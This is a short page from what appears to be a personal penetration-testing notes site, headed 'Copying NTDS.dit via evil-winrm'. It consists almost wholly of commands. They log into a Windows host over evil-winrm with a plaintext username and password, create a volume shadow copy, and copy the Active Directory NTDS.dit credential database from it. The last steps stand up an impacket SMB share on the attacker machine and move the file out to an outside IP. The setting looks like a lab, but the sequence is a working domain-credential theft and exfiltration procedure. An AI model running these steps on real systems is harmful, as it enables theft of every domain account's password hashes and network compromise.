> For the complete documentation index, see [llms.txt](https://kyou00.gitbook.io/xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kyou00.gitbook.io/xyz/commands/view/windows/copying-ntds.dit-via-evil-winrm.md).

# Copying NTDS.dit via evil-winrm

<pre data-overflow="wrap"><code><strong># Attacker Machine
</strong>./evil-winrm.rb -i 10.129.202.85 -u jmarston -p 'P@ssword!'

<strong># Checking for local group membership
</strong>net localgroup

<strong># Checking for the user privilege
</strong>net user jmarston

<strong># Copying a drive when the AD is initially created
</strong>vssadmin CREATE SHADOW /For=C:

<strong># Then do this
</strong><strong># First we make a directory in the C:\ named NTDS
</strong>mkdir NTDS
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

<strong># Then before we will get the ntds.dit file 
</strong><strong># We have to create a directory in our attacker machine and open up a smbserver
</strong>mkdir TmpDirectory
sudo impacket-smbserver -smb2support NTDSFileShare TmpDirectory

<strong># Then just move the file to attacker machine
</strong>cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\CompData 
</code></pre>
